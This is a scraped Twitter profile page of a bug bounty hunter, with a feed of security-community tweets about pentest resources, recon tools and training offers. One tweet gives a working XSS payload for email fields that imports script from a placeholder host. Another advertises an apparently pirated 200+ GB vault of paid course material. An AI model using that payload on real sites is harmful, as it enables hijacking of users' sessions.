Gajendra upadhyay (@almighty_one007) 's Twitter Profile
Gajendra upadhyay

@almighty_one007

Cybersecurity Researcher, Bug Bounty hunter,Blockchain Enthusiast

ID: 718509586576121856

calendar_today08-04-2016 18:43:29

760 Tweet

37 Takipรงi

363 Takip Edilen

Nithin ๐Ÿฆนโ€โ™‚๏ธ (@thebinarybot) 's Twitter Profile Photo

Cloud security is one of the hottest topics to learn in 2024 to make $$$$. Explore GCP security through extensive guides, tutorials, and interactive training resources for comprehensive learning๐Ÿง‘โ€๐Ÿ’ป

Cloud security is one of the hottest topics to learn in 2024 to make $$$$.

Explore GCP security through extensive guides, tutorials, and interactive training resources for comprehensive learning๐Ÿง‘โ€๐Ÿ’ป
Nithin ๐Ÿฆนโ€โ™‚๏ธ (@thebinarybot) 's Twitter Profile Photo

Every Beginner Bug Bounty Hunter must check this. One of the most easiest bugs you can find as a beginner and make $$$ in 2024 ๐Ÿงต๐Ÿ‘‡

Nithin ๐Ÿฆนโ€โ™‚๏ธ (@thebinarybot) 's Twitter Profile Photo

Want to learn more about Mobile App Pentest / Bug Hunting ? Here is a list of high-quality resources ๐Ÿ‘‡ ( PS: The list includes both Android and iOS hacking )

EDDIE CHENG (@ecomeddie) 's Twitter Profile Photo

Iโ€™m 33. When I was young, I wasted years drinking, smoking, and being a degenerate. Then I discovered Naval Ravikant and he changed my life forever. Here are 20 teachings from the wisest person of this century (that will change your life too):

Iโ€™m 33. 

When I was young, I wasted years drinking, smoking, and being a degenerate.

Then I discovered Naval Ravikant and he changed my life forever.

Here are 20 teachings from the wisest person of this century (that will change your life too):
Nithin ๐Ÿฆนโ€โ™‚๏ธ (@thebinarybot) 's Twitter Profile Photo

๐Ÿ•ต๏ธ Finding hidden parameters which are left unnoticed by most of hunters, will definitely help you to get more bugs. One such tool used to find hidden parameters is ARJUN. Checkout this 10 Arjun techniques which every bug bounty hunter should know ๐Ÿ‘‡

๐Ÿ•ต๏ธ Finding hidden parameters which are left unnoticed by most of hunters, will definitely help you to get more bugs. One such tool used to find hidden parameters is ARJUN. 

Checkout this 10 Arjun techniques which every bug bounty hunter should know ๐Ÿ‘‡
zseano (@zseano) 's Twitter Profile Photo

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limitโ€ฆ

Jason Haddix (@jhaddix) 's Twitter Profile Photo

My talk is coming up for NahamCon! Ben Sadeghipour Here is the work-in-progress XSS mutation bot: chatgpt.com/g/g-1cW3hzJ3C-โ€ฆ and the work-in-progress Acquisitions Bot: chatgpt.com/g/g-3GwxLih5t-โ€ฆ and the work-in-progress Reporting Bot: chatgpt.com/g/g-7BYOKw9eo-โ€ฆ and my epic general web

Md Riyazuddin (@riyazmd774) 's Twitter Profile Photo

Everything you can do legally (or almost) with Flipper Zero. The Ultimate Tamagotchi for Hackers... [ ๐Ÿ”– Save this for later ]

Everything you can do legally (or almost) with Flipper Zero.

The Ultimate Tamagotchi for Hackers...

[ ๐Ÿ”– Save this for later ]
Jason Haddix (@jhaddix) 's Twitter Profile Photo

Arcanum Information Security On June 23rd i'll be giving my "Credential Operations" / "Operationalizing Cybercrime Data for Red Teamers and Offsec" training FREE! it's gonna be ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Register here ๐Ÿ‘‡ flare.registration.goldcast.io/webinar/1e64a5โ€ฆ

<a href="/arcanuminfosec/">Arcanum Information Security</a> On June 23rd i'll be giving my "Credential Operations" / "Operationalizing Cybercrime Data for Red Teamers and Offsec" training FREE! it's gonna be ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ

Register here ๐Ÿ‘‡ 

flare.registration.goldcast.io/webinar/1e64a5โ€ฆ
chux (@chux13786509) 's Twitter Profile Photo

Just tried FOFA AI on a fresh target, and the results blew me away! ๐Ÿš€ It enriched domains, certs, ASNs, and names, then generated a detailed graph of the target's attack surface in minutes. Hands down, better than many recon automation tools I've used for building a map of the

Just tried FOFA AI on a fresh target, and the results blew me away! ๐Ÿš€
It enriched domains, certs, ASNs, and names, then generated a detailed graph of the target's attack surface in minutes.
Hands down, better than many recon automation tools I've used for building a map of the
X (@themsterdoctor1) 's Twitter Profile Photo

๐Ÿง ๐Ÿ’ฃ 381 FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: ๐Ÿ”ฅ OSCP ๐Ÿ”ฅ OSEP ๐Ÿ”ฅ OSWE ๐Ÿ”ฅ THM / HTB ๐Ÿ”ฅ EC-Council ๐Ÿ”ฅ Cisco CyberOps ๐Ÿ”ฅ Linux Priv Esc ๐Ÿ”ฅ PEN-300 Full Video Series ๐Ÿ”ฅ BloodHound, AD, SSH, API, SQL, ๐Ÿ”ฅ

๐Ÿง ๐Ÿ’ฃ  381 FILES. 200+ GB. ELITE ONLY.

I just unlocked a vault that would make even top bug bounty hunters drop everything:

๐Ÿ”ฅ OSCP
๐Ÿ”ฅ OSEP
๐Ÿ”ฅ OSWE
๐Ÿ”ฅ THM / HTB
๐Ÿ”ฅ EC-Council
๐Ÿ”ฅ Cisco CyberOps
๐Ÿ”ฅ Linux Priv Esc
๐Ÿ”ฅ PEN-300 Full Video Series
๐Ÿ”ฅ BloodHound, AD, SSH, API, SQL, ๐Ÿ”ฅ
HackerRats - Uncle Rat โค๏ธ (XSS Rat) (@thexssrat) 's Twitter Profile Photo

Giveaway thiiiemmmmeeeee RATS LISTEN UP I will do this for you , but PLEASE get me to 150 k 1000's OF FREE COURSES!!! PLEASE SHARE AND SHOW THE WORLD THAT THE RAT IS STRONG!! CAPIE ========== udemy.com/course/capie-cโ€ฆ udemy.com/course/capie-cโ€ฆ CNWPP ==========